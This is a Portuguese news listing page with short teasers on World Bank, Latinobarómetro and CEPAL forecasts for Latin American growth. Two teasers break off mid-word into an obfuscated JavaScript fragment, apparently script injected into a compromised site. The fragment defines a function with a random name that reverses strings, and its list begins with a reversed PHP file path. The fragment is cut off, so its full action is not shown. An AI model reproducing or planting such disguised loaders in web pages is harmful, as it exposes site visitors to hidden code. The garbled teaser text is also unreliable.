Economia AL

As mais recentes previsões do Banco Mundial apontam para a retoma do crescimento económico da região latino-americana em 2016. O Banco Mundial perspetiva que o crescimento regional atinja 1%. Panamá (6%), República Dominicana (4,9%) e Nicarágua (4,6%) lideram a lista dos países que mais ir
Ler mais
De acordo com o estudo Latinobarómetro, o Equador e a Bolívia foram os países da região que registaram progressos socioeconómicos mais significativos. Estes progressos são relativos à perceção do público e, no geral, estes dois países foram capazes de melhorar os seus indicadores. De
Ler mais
A Comissão Económica das Nações Unidas para a América Latina (CEPAL) prevê que as economias mais próximas dos Estados Unidos registem níveis positivos de crescimento económico. Entre os países sul-americanos, a Bolívia liderará os índices de crescimento do PIB, regist$GQRkExOVl1p57bb
Ler mais
No relatório ‘’Chile: Policy Priorities for Stronger $GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/
Ler mais
O Banco Mundial defende que, por forma a fazer face à redução dos preços das matérias-primas e ao nulo crescimento económico, os países latino-americanos devem reajustar as suas contas externas e reduzir os gastos internos. (more…)
Ler mais